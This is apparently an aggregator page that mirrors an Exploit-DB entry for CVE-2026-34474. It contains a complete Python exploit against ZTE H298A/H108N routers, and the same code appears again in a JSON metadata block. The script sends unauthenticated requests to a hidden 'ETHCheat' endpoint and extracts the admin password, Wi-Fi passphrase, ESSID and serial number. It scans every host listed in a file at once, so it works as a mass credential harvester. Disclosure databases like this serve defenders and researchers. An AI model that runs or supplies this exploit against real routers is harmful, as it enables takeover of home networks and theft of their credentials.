ZTE H298A / H108N – Unauthenticated Credential Exposure_EDB-ID:52592

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Description

Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure via ETHCheat Parameter Date: 2026-05-20 Exploit Author: Mina Nageh Salalma Monx Research Vendor Homepage: https://www.zte.com.cn Software Link:...

Visit Original Source

Basic Information

ID EDB-ID:52592

Published May 29, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure
via ETHCheat Parameter
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure
# Version: ZXHN H298A 1.1, ZXHN H108N 2.6
# Tested on: ZTE ZXHN H298A 1.1, ZTE ZXHN H108N 2.6
# CVE: CVE-2026-34474

# Description:
# An unauthenticated attacker can retrieve the live administrator password,
# WLAN PSK, and ESSID from a ZTE H298A or H108N router by issuing a single
# HTTP GET request to /getpage.lua?pid=1000&ETHCheat=1. The device returns
# HTML markup containing the fields OBJ_USERINFO_IDPassword1 (admin
password),
# WLANPSK_KeyPassphrase1 (Wi-Fi PSK), and WLANAP_ESSID1 in plaintext.
# A second related endpoint exposes the serial number.
# No authentication, session, or cookie is required.
#
# Affected Firmware:
# - ZXHN H298A 1.1
# - ZXHN H108N 2.6
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34474
# Full write-up:
https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure

import aiohttp
import asyncio
import html
import re
import os
from colorama import Fore, Style, init

init() # Initialize colorama

async def get_essid_password(session, url):
try:
async with aiohttp.ClientSession() as session:
# First request
async with session.get("http://" + url +
"/getpage.lua?pid=1000&ETHCheat=1", verify_ssl=False) as response:
html_text = await response.text()
Admin =
re.search(r"id\s*=\s*'OBJ_USERINFO_IDPassword1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
Admin = html.unescape(Admin)
ESSID =
re.search(r"id\s*=\s*'WLANAP_ESSID1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
ESSID = html.unescape(ESSID)
password =
re.search(r"id\s*=\s*'WLANPSK_KeyPassphrase1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
password = html.unescape(password)

async with session.get("http://" + url +
"/wizard_page/wizard_overETHfail_set_lua.lua") as response:
html_text = await response.text()
serial_num =
re.search(r"<ParaName>SerialNumber</ParaName><ParaValue>(.*?)</ParaValue>",
html_text).group(1)
serial_num = html.unescape(serial_num)

return {"URL": url, "Admin Password": Admin, "ESSID": ESSID,
"WIFI-Password": password, "Serial Number": serial_num}
except Exception as e:
return {"URL": url, "Admin Password": "", "ESSID": "",
"WIFI-Password": "", "Serial Number": ""}

async def main():
with open("urls.txt", "r") as f:
urls = f.read().splitlines()
tasks = []
async with aiohttp.ClientSession() as session:
for url in urls:
tasks.append(get_essid_password(session, url))
results = await asyncio.gather(*tasks)
for r in results:
print(f"[+] {r['URL']} | Admin: {r['Admin Password']} | ESSID:
{r['ESSID']} | WiFi: {r['WIFI-Password']} | Serial: {r['Serial Number']}")

if __name__ == "__main__":
asyncio.run(main())

{
    "lastseen": "2026-05-29T11:29:18",
    "description": "Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure via ETHCheat Parameter Date: 2026-05-20 Exploit Author: Mina Nageh Salalma Monx Research Vendor Homepage: https://www.zte.com.cn Software Link:...",
    "published": "2026-05-29T00:00:00",
    "modified": "2026-05-29T00:00:00",
    "type": "exploitdb",
    "title": "ZTE H298A / H108N - Unauthenticated Credential Exposure",
    "source": "",
    "references": "",
    "id": "EDB-ID:52592",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-34474"
    ],
    "sourceData": "# Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure\r\nvia ETHCheat Parameter\r\n# Date: 2026-05-20\r\n# Exploit Author: Mina Nageh Salalma (Monx Research)\r\n# Vendor Homepage: https://www.zte.com.cn\r\n# Software Link:\r\nhttps://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure\r\n# Version: ZXHN H298A 1.1, ZXHN H108N 2.6\r\n# Tested on: ZTE ZXHN H298A 1.1, ZTE ZXHN H108N 2.6\r\n# CVE: CVE-2026-34474\r\n\r\n# Description:\r\n# An unauthenticated attacker can retrieve the live administrator password,\r\n# WLAN PSK, and ESSID from a ZTE H298A or H108N router by issuing a single\r\n# HTTP GET request to /getpage.lua?pid=1000&ETHCheat=1. The device returns\r\n# HTML markup containing the fields OBJ_USERINFO_IDPassword1 (admin\r\npassword),\r\n# WLANPSK_KeyPassphrase1 (Wi-Fi PSK), and WLANAP_ESSID1 in plaintext.\r\n# A second related endpoint exposes the serial number.\r\n# No authentication, session, or cookie is required.\r\n#\r\n# Affected Firmware:\r\n# - ZXHN H298A 1.1\r\n# - ZXHN H108N 2.6\r\n#\r\n# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34474\r\n# Full write-up:\r\nhttps://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure\r\n\r\nimport aiohttp\r\nimport asyncio\r\nimport html\r\nimport re\r\nimport os\r\nfrom colorama import Fore, Style, init\r\n\r\ninit()  # Initialize colorama\r\n\r\nasync def get_essid_password(session, url):\r\n    try:\r\n        async with aiohttp.ClientSession() as session:\r\n            # First request\r\n            async with session.get(\"http://\" + url +\r\n\"/getpage.lua?pid=1000&ETHCheat=1\", verify_ssl=False) as response:\r\n                html_text = await response.text()\r\n                Admin =\r\nre.search(r\"id\\s*=\\s*'OBJ_USERINFO_IDPassword1'\\s*value\\s*=\\s*'([^']+)'\",\r\nhtml_text).group(1)\r\n                Admin = html.unescape(Admin)\r\n                ESSID =\r\nre.search(r\"id\\s*=\\s*'WLANAP_ESSID1'\\s*value\\s*=\\s*'([^']+)'\",\r\nhtml_text).group(1)\r\n                ESSID = html.unescape(ESSID)\r\n                password =\r\nre.search(r\"id\\s*=\\s*'WLANPSK_KeyPassphrase1'\\s*value\\s*=\\s*'([^']+)'\",\r\nhtml_text).group(1)\r\n                password = html.unescape(password)\r\n\r\n            async with session.get(\"http://\" + url +\r\n\"/wizard_page/wizard_overETHfail_set_lua.lua\") as response:\r\n                html_text = await response.text()\r\n                serial_num =\r\nre.search(r\"<ParaName>SerialNumber</ParaName><ParaValue>(.*?)</ParaValue>\",\r\nhtml_text).group(1)\r\n                serial_num = html.unescape(serial_num)\r\n\r\n            return {\"URL\": url, \"Admin Password\": Admin, \"ESSID\": ESSID,\r\n\"WIFI-Password\": password, \"Serial Number\": serial_num}\r\n    except Exception as e:\r\n        return {\"URL\": url, \"Admin Password\": \"\", \"ESSID\": \"\",\r\n\"WIFI-Password\": \"\", \"Serial Number\": \"\"}\r\n\r\nasync def main():\r\n    with open(\"urls.txt\", \"r\") as f:\r\n        urls = f.read().splitlines()\r\n    tasks = []\r\n    async with aiohttp.ClientSession() as session:\r\n        for url in urls:\r\n            tasks.append(get_essid_password(session, url))\r\n        results = await asyncio.gather(*tasks)\r\n    for r in results:\r\n        print(f\"[+] {r['URL']} | Admin: {r['Admin Password']} | ESSID:\r\n{r['ESSID']} | WiFi: {r['WIFI-Password']} | Serial: {r['Serial Number']}\")\r\n\r\nif __name__ == \"__main__\":\r\n    asyncio.run(main())",
    "sourceHref": "https://www.exploit-db.com/raw/52592",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52592",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply